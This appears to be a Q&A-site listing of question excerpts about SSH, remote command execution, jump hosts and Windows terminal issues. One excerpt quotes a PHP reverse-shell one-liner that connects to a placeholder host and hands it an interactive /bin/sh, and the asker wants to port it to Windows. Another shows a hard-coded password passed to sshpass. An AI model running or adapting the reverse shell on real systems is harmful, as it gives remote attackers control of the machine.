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Execute a remote shell script from within screen via SSH and view stdout in one command

Couldn't find an answer for my particular use-case in the hours I've unsuccessfully researched this. I have a script located on machine B. I am aiming to run a command on machine A that establishes an ...
DeathToMediocrity's user avatar
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One liner command to ssh to server2, switch to another user in server2, ssh into server3, run commands in server3 and get output

Because I can only get to server3 from server2 (Server2 running CentOS7), I'm trying to create a "template" command or a script that I can use to : ssh to server2 switch to another user in ...
Tlink's user avatar
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How to run `nvm` for Windows through SSH?

I'm on macOS and try to run nvm on a Windows host via OpenSSH. I installed nvm via scoop install nvm on my Windows remote. The environment variables are set and where nvm resolves properly, but trying ...
Martin Braun's user avatar
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pipefail over ssh in linux

set -o pipefail is not getting evaluated correctly on the remote host if the set command is used in ssh command. Example ssh hostname "set -o pipefail; false | true; echo $?" - gives 0 (Not ...
Praneeth Gudumasu's user avatar
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How to run a single command via ssh to WSL2 [duplicate]

I'm trying to run a command from a non-Windows device that looks something like this: ssh me@host 'cat file' > file host is a Windows 11 box that is configured to SSH directly into a WSL2 shell. ...
Michael's user avatar
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Stuck at Vagrant connect to SSH

I am using Vagrant 2.3.4 and Virtual Box 7.0.8 to setup VM box eurolinux-vagrant/centos-stream-9 9.0.37 on Windows 10. After using vagrant up, I have faced the SSH issue with this log: Net::SSH::...
BachKhoa's user avatar
3 votes
2 answers

SSH remote command with nohup not working as expected

I wanted to run a long running command in a remote server, even after the connection terminates. So I thought of using ssh host "nohup cmd &". But for some reason, neither cmd is going ...
Sourav Kannantha B's user avatar
4 votes
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Query effective ssh (client) config from the command line

Is there any way to query the effective ssh (client) configuration? Specifically: can I determine e.g. whether there's an entry for a given host, what's the ProxyJump or User setting for that host etc....
Johannes Bauer's user avatar
3 votes
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Why can I ssh and return a result faster than Linux can with a bundled command?

I'm writing a short bash script that involves logging into roughly 100 nodes and counting the number of processes running in top with my username, and I'm trying to combine the ssh-related processes ...
Headphones's user avatar
16 votes
4 answers

What's the simplest way to display a browser-based interface on a computer without a GUI?

I am converting an old laptop into what will basically just be a terminal for some of my other computers. For the most part, I only need to ssh into my computers, and that I can do with any CLI-based ...
Valiant's user avatar
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How can I access an intranet web site in the browser with command line?

From internet, I have access via ssh to the Machine_A and it can access the intranet. So, I can access all intranet sites with command line like: ssh Machine_A -f 'curl -s' > ...
Rodrigo's user avatar
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Directly connecting a internal node of a remote server

I was trying to open files like .ipynb via terminal command line (command: code) on the remote server in VSCode. But code is not in PATH, so I used ~/.vscode-server/bin/...
xu chen's user avatar
1 vote
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How to make "<&3 >&3 2>&3" command works in Windows as in Linux?

I tried this commmand on Debian GNU/Linux 11 (bullseye) shell : php -r '$sock=fsockopen("HOST",PORT);exec("/bin/sh -i <&3 >&3 2>&3");', and it worked ...
Wira Wibowo's user avatar
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Mouse Wheel scrolling in Screen session via Command Prompt/Powershell

I want to scroll via Mouse Wheel in a screen session I run in the Command Prompt or Powershell. I already uncommented termcapinfo xterm|xterms|xs|rxvt ti@:te@ in my .screenrc. I can scroll when I use ...
Skyy1337's user avatar
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The App is not open in Windows by sending the command through SSH connection from the virtual Linux

I have a system in which there is Windows OS and a virtual environment, including Ubuntu. I installed OpenSSH on the Windows OS, then configured it to establish an SSH connection between the virtual ...
Armin Amini's user avatar
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2 answers

MobaXTerm: opening a new SSH session from Win CMD with logging

first topic here, so apologies in advance, if I am doing something wrong! Searching with various terms did not yield in useful results, so I would like to ask for your help. Is it possible to start a ...
scotofil's user avatar
1 vote
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scp doesn't trigger initial prompt even though known_hosts is empty or deleted

I have a bash script to copy a file to a remote server using scp and expect. The script is as follows: #!/usr/bin/expect -f set port [lindex $argv 0] set file_to_send [lindex $argv 1] set login [...
CaTx's user avatar
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1 answer

Start cygwin bash.exe without inheriting windows home

I want to be able to run in the cygwin environment from CMD but when I run C:\cygwin64\bin\bash.exe -l -i my home gets set to the windows home. As I understand bash.exe inherits the environment from ...
Pangi's user avatar
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How to check version of ssh-keygen?

What command can be used in Linux to display the version of ssh-keygen? Its man page doesn't tell the version, oddly, nor does it mention any option to do it (e.g. -v or --version). Of no use is apt-...
ByteEater's user avatar
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2 answers

Running a Command using sshpass

I am trying to run a command using sshpass in a bash script to another linux server. kernel_ipv4= vmpassword=dfbvndfbnpdp sshpass -p "$vmpassword" ssh -o "...
ph3ro's user avatar
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6 votes
1 answer

sending print string command to remote machine

I'd like to print some string to all open terminals processes that are running in remote machine. currently I'm using ssh to connect the remote machine, and than I echo my string into wall command : ...
osxUser's user avatar
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How to combine these commands to SSH into remote machine?

I have three machines, let's call them Work, Home and Laptop, all on different networks. My goal is to remotely SSH into Home from Laptop. This is how I do this currently: Connect all three machines ...
Train Heartnet's user avatar
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Disconnecting from SSH session whilst continuing to run process, then rejoining it

I log on to an ssh session via ssh [email protected] I then run a code via ./main From here, I'd like to disconnect completely from the ssh session and switch off my PC. I'd like for the process ...
Steve's user avatar
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Sending command: scp -v -t / exec request failed on channel 0

Attempting to send a simple txt file (soon to be csv files) from Windows Server 2019 using scp command (or sftp, or ssh) to a remote server. Remote server employee gave us a username and password to ...
cooldan1's user avatar
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2 answers

Get output of remote command locally

Let's assume I have a remote server with ssh access. On the server, there is a command 'cmd_x' when I execute it, it will open an interactive command line where I can write commands (specific commands)...
Nasreddine's user avatar
2 votes
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How to find the key ID in gpg to use with --export-ssh-key

I want to use gpg --export-ssh-key but I cannot figure out how to supply the key id. I have the following keys: > gpg --list-keys --keyid-format SHORT pub rsa3072/D54EC263 2022-04-30 [SC] ...
Vincent's user avatar
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How to send images to local windows clipboard from ssh connection?

I have an ssh connection to my other computer running Ubuntu. I want to be able to copy an image from a file, example.png and have it show up in the clipboard (not as text) and be able to paste it ...
Epik's user avatar
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How can I modify this bash script so that the port argument is optional?

I often connect through ssh to Docker containers running on a remote server. Every time the container is stopped or removed, I need to copy my ssh key on the container again, in order to connect. For ...
DeltaIV's user avatar
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Having your shell commands run after consecutive ssh

I have a function in my zsh source file ~/.zshrc: function cr() { ssh -p 5022 [email protected] ssh servername2 screen -ls } However, everything after the first ssh seems to be ...
JKHA's user avatar
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include in log elevated sudo users

I'm new here, but I tried looking but couldn't get how to do it... I have an ec2 linux box. When a user directly connects to the machine I can view its ssh ip. Now when a user does sudo -s for example ...
MDray's user avatar
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3 votes
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Use SSH key signing with Git and ssh-agent under Windows

Situation I'm using Git 2.34 under Windows with GIT_SSH_COMMAND set to Windows OpenSSH implementation (it's also set on PATH). I want to use the new Git SSH key commit signing feature in combination ...
new_turtle's user avatar
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Command Prompt Black Screen NVIM

I'm facing a really annoying issue with CMD these days. When attempting to launch neovim on Windows, the display is full black and I don't see any output. Issue is the same when I SSH into a Linux ...
Guillaume Aubert's user avatar
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ssh connexion : Permission denied (publickey,password)

I'm trying to connect to my server with a ssh connection, so it works when I use FileZilla but not with the command line ssh <login>@<ServerIP> -i /Volumes/ExternalDisk/key.ppk I have this ...
TooikLeChevalier's user avatar
3 votes
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Handle command line argument value from in-memory / inject content instead of use cli argument

Is there a way to handle command line arguments from in-memory? My concrete problem is, I have a volume encrypted with luks, with a detached header file. Setup as following: workstation server I don'...
Marc's user avatar
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1 answer

How can I add my ssh public key to a Mikrotik router device using the command line?

Mikrotik doesn't support ssh-copy-id which copies ~/.ssh/ into the .ssh/authorized_keys file of a host on almost all Linux devices. Is there an equivalent way to authorize a key on a ...
Dagelf's user avatar
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Cannot execute SUID bash script with sudo as SSH command [duplicate]

I have simple bash script: #!/bin/bash sudo etherwake -i enp0s31f6 -D -b xx:xx:xx:xx:xx:xx I have set also SUID bit and root as owner: -rwSr-xr-x 1 root root 64 Aug 19 04:23 If I run it ...
Lukáš Michalec's user avatar
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Send remote linux command with 2 ssh via bastion

I'm trying to send a command to my machine which is on private cloud. for that I need to connect to bastion server and then to the private machine. my terminal -> bastion server -> target vm I ...
S_Nissan's user avatar
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Why does `history -s` wipe my command history?

I am working on a project where the STG and LIVE environments have multiple instances, including a central 'gfs' server where you can do database admin You access all of the instances via a 'bastion' ...
Scott Anderson's user avatar
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Windows cmd prompt and powershell have scrolling problems with vi editor when connecting by ssh to Linux system

I am trying to connect from my Windows laptop to a Linux system via ssh in the command prompt. (Tried powershell too.) If I try to use the vi editor, the screen cannot scroll properly. Many lines ...
bob.sacamento's user avatar
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Running multiple ssh commands

I've got a command in bitbucket that runs multiple ssh commands, is there a way to run each command once the previous has completed? ssh <user>@<host> 'cd /<dir>/; git ...
Bradmage's user avatar
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Password via SSH through command prompt, is it secure

If I run SSH command via a Windows bat file, is the communication secure. I have the following command in my batch file and it asks for the password once it is executed. I am worried whether the ...
Ishan Hettiarachchi's user avatar
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SSH connection gets stuck when using jump host

At my work, we have a jump host over which I must connect to the cluster. Usually, the connection statement would be ssh -t herp@jumphost ssh cluster Furthermore, this connection has to be made from ...
HerpDerpington's user avatar
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Copy file from local to remote SSH with spaces in username

I have to copy a file from my local machine to a remote server. The problem is, from what I'm understanding, is the space in my username ("User Name"). I've tried the following in command ...
Emerald Bay's user avatar
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Does molly-guard interfere with apcupsd shutdown process?

Does molly-guard interfere with apcupsd's shutdown process for the master or slave? I have molly-guard installed on both the apcupsd master and slave machines and am unable to test if it will ...
greg5678's user avatar
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How to Start an exe from .bat file without tying up the command line

I am using SSH to command line into another computer and execute .bat scripts. (Windows 10). But when I run a batch file that has the following in it start c:\Program Files\qBittorrent\qbittorrent....
Kairan's user avatar
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How to check number of parked cores in command line (win, lin) via ssh

I'm wondering how to check number of parked cores via CMD on Windows remotely, via ssh. I'm also using cygwin there, so bash scrips would also help. I tried to look for answers but it usualy directs ...
CerebralFalsificator's user avatar
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How to use patch command in WinSCP?

I need to apply this patch to my WordPress website. It seems that to do that, I need to SSH to my hosting and use Unix command patch < path_to_patch. However, since I'm using a shared hosting, not ...
Ooker's user avatar
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Windows 10's SSH Client can't paste tilde and backtick

I'd like to use Windows 10's SSH Client so I don't have to install other programs to ssh but it is impossible for me to paste the tilde character (~) and the backtick (`), they are just ignored. By ...
Christian Toffolo's user avatar
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PuTTY / plink - How to execute command AND keep shell alive

I'm remote connecting to a linux machine from windows using PLINK and would like to execute some commands in a batch script right after connecting, but it seems I cannot keep the terminal alive. After ...
Comfort Eagle's user avatar
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Stop cmd from beeping when connected to linux terminal via ssh

I use cmd.exe of Windows 10 to remotely connect to a linux server via ssh. But it keeps beeping when I press certain keys, for example, pressing backspace when it is empty after the prompt, or ...
trisct's user avatar
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